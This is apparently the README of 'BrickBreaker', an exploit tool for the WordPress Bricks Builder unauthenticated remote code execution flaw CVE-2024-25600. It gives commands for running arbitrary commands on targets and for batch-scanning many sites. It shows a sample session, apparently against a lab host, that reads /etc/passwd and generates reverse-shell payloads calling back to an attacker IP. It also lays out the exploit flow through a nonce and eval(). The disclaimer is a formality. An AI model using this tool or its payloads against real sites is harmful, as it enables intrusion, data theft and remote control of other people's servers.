Share
## https://sploitus.com/exploit?id=0CFB79ED-256D-56F3-8885-1C154C11057E
# ๐Ÿงฑ BrickBreaker



![Python](https://img.shields.io/badge/Python-3.8+-blue?style=for-the-badge&logo=python&logoColor=white)
![CVE](https://img.shields.io/badge/CVE--2024--25600-Critical-red?style=for-the-badge)
![Version](https://img.shields.io/badge/Version-2.1.0-green?style=for-the-badge)

**WordPress Bricks Builder RCE Exploit**

*Unauthenticated Remote Code Execution with Stable Interactive Shell*

[Features](#-features) โ€ข
[Installation](#-installation) โ€ข
[Usage](#-usage) โ€ข
[Shell Commands](#-shell-commands) โ€ข
[Technical Details](#-technical-details)



---

## โœจ Features

| Feature | Description |
|---------|-------------|
| ๐Ÿ”ฅ **Multiple Payloads** | `code`, `container`, `carousel` payload types |
| ๐Ÿš **Interactive Shell** | PTY-like experience with rich formatting |
| ๐Ÿ“ **File Operations** | Upload/download files via base64 encoding |
| ๐Ÿ”„ **Reverse Shell** | Built-in reverse shell payload generator |
| ๐ŸŽจ **Rich Output** | Beautiful colored terminal with progress indicators |
| ๐Ÿ” **Batch Scanner** | Scan multiple targets from file |
| โšก **Fast & Reliable** | HTTP connection pooling with httpx |

---

## ๐Ÿ“ฆ Installation

### Requirements

- Python 3.8+
- pip

### Quick Install

```bash
# Clone repository
git clone https://github.com/yourusername/brickbreaker.git
cd brickbreaker

# Install dependencies
pip install -r requirements.txt
```

### Manual Install

```bash
pip install httpx rich
```

---

## ๐Ÿš€ Usage

### Basic Usage

```bash
# Interactive shell (most common)
python3 brickbreaker.py https://target.com

# Auto-detect HTTPS
python3 brickbreaker.py target.com
```

### Single Command Execution

```bash
# Execute one command and exit
python3 brickbreaker.py https://target.com -c "id"
python3 brickbreaker.py https://target.com -c "cat /etc/passwd"
python3 brickbreaker.py https://target.com -c "ls -la /var/www/html"
```

### Different Payload Types

```bash
# Default: code payload
python3 brickbreaker.py https://target.com

# Container payload (alternative)
python3 brickbreaker.py https://target.com -p container

# Carousel payload (another alternative)
python3 brickbreaker.py https://target.com -p carousel
```

### Batch Scanning

```bash
# Scan multiple targets
python3 brickbreaker.py --scan targets.txt

# Save vulnerable URLs to file
python3 brickbreaker.py --scan targets.txt -o vulnerable.txt
```

### All Options

```
python3 brickbreaker.py -h

usage: brickbreaker.py [-h] [-c COMMAND] [-p {code,container,carousel}]
                       [-t TIMEOUT] [-q] [--scan FILE] [-o OUTPUT] [-v]
                       [url]

CVE-2024-25600 - WordPress Bricks Builder RCE Exploit

positional arguments:
  url                   Target URL

optional arguments:
  -h, --help            show this help message and exit
  -c, --command         Execute single command
  -p, --payload         Payload type (default: code)
  -t, --timeout         Request timeout (default: 30)
  -q, --quiet           Minimal output
  --scan FILE           Batch scan URLs from file
  -o, --output          Save vulnerable URLs to file
  -v, --version         Show version
```

---

## ๐Ÿš Shell Commands

Once inside the interactive shell:

| Command | Description |
|---------|-------------|
| `help` | Show available commands |
| `info` | Display session information (user, kernel, IP, etc.) |
| `clear` | Clear the terminal screen |
| `download ` | Download file from target to local machine |
| `upload ` | Upload local file to target's `/tmp/` |
| `revshell` | Generate and execute reverse shell payloads |
| `exit` | Close the session |

### Example Session

```
 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•— 
 โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•    โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘ โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•”โ•โ•โ•โ•โ•โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•     โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ• โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—  โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•
 โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘     โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•—     โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•— โ–ˆโ–ˆโ•”โ•โ•โ•  โ–ˆโ–ˆโ•”โ•โ•โ–ˆโ–ˆโ•—
 โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘โ•šโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•—    โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•”โ•โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•—โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ•—โ–ˆโ–ˆโ•‘  โ–ˆโ–ˆโ•‘
 โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ• โ•šโ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•    โ•šโ•โ•โ•โ•โ•โ• โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•  โ•šโ•โ•โ•šโ•โ•โ•โ•โ•โ•โ•โ•šโ•โ•  โ•šโ•โ•

                        CVE-2024-25600 | RCE Exploit | v2.1.0

โœ“ Nonce found: 0aed3bea03
โœ“ Target is VULNERABLE to CVE-2024-25600
  User: apache | Host: bricks

โ•ญโ”€ ๐Ÿš BrickBreaker Shell โ”€โ•ฎ
โ”‚ Shell established!       โ”‚
โ”‚ User: apache             โ”‚
โ”‚ Host: bricks             โ”‚
โ”‚ Type 'help' for commands โ”‚
โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ

apache@bricks:/var/www/html$ id
uid=48(apache) gid=48(apache) groups=48(apache)

apache@bricks:/var/www/html$ info
โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ Session Info โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ
โ”‚ Property     โ”‚ Value               โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ Target       โ”‚ https://bricks.thm  โ”‚
โ”‚ User         โ”‚ apache              โ”‚
โ”‚ Hostname     โ”‚ bricks              โ”‚
โ”‚ Kernel       โ”‚ 5.4.0-1029-aws      โ”‚
โ”‚ IP Address   โ”‚ 10.82.149.50        โ”‚
โ”‚ Working Dir  โ”‚ /var/www/html       โ”‚
โ”‚ Nonce        โ”‚ 0aed3bea03          โ”‚
โ”‚ Payload      โ”‚ code                โ”‚
โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ

apache@bricks:/var/www/html$ download /etc/passwd
โœ“ Downloaded: passwd (1847 bytes)

apache@bricks:/var/www/html$ revshell
Your IP: 10.10.10.10
Your Port [4444]: 4444

โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€ Reverse Shells โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ
โ”‚ Type   โ”‚ Payload                      โ”‚
โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ผโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ค
โ”‚ bash   โ”‚ bash -c "bash -i >& /dev/... โ”‚
โ”‚ python โ”‚ python3 -c 'import socket... โ”‚
โ”‚ nc     โ”‚ rm /tmp/f;mkfifo /tmp/f;c... โ”‚
โ”‚ php    โ”‚ php -r '$s=fsockopen("10....โ”‚
โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”ดโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ

Execute which? [bash/python/nc/php/none]: 
```

---

## ๐Ÿ”ง Technical Details

### Vulnerability Information

| Property | Value |
|----------|-------|
| **CVE ID** | CVE-2024-25600 |
| **CVSS Score** | 9.8 (Critical) |
| **Type** | Unauthenticated Remote Code Execution |
| **Affected** | Bricks Builder โ‰ค 1.9.6 |
| **Patched** | Bricks Builder 1.9.6.1+ |

### Root Cause

The vulnerability exists in the `Bricks\Query` class, specifically in the `prepare_query_vars_from_settings` method. User-controlled input from the `queryEditor` parameter is passed directly to PHP's `eval()` function without proper sanitization.

### Exploit Flow

```
1. Fetch nonce from target homepage (exposed in bricksData JS object)
2. Send POST request to /wp-json/bricks/v1/render_element
3. Payload executes via eval() in prepare_query_vars_from_settings
4. Command output returned in Exception message
```

### Payload Types

| Type | Method | Best For |
|------|--------|----------|
| `code` | PHP code block execution | Most reliable, default |
| `container` | Loop query injection | Alternative if code fails |
| `carousel` | Carousel query injection | Another alternative |

---

## โš ๏ธ Disclaimer

```
THIS TOOL IS PROVIDED FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING ONLY.

Unauthorized access to computer systems is illegal. Always obtain proper 
authorization before testing. The author is not responsible for any misuse 
or damage caused by this tool.
```

---

## ๐Ÿ“š References

- [CVE-2024-25600 - NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-25600)
- [Original Disclosure - Snicco](https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6)
- [Bricks Builder](https://bricksbuilder.io/)

---

## ๐Ÿ™ Credits

- Original vulnerability discovery: [Snicco Security](https://snicco.io)
- Exploit inspiration: [Chocapikk](https://github.com/Chocapikk/CVE-2024-25600)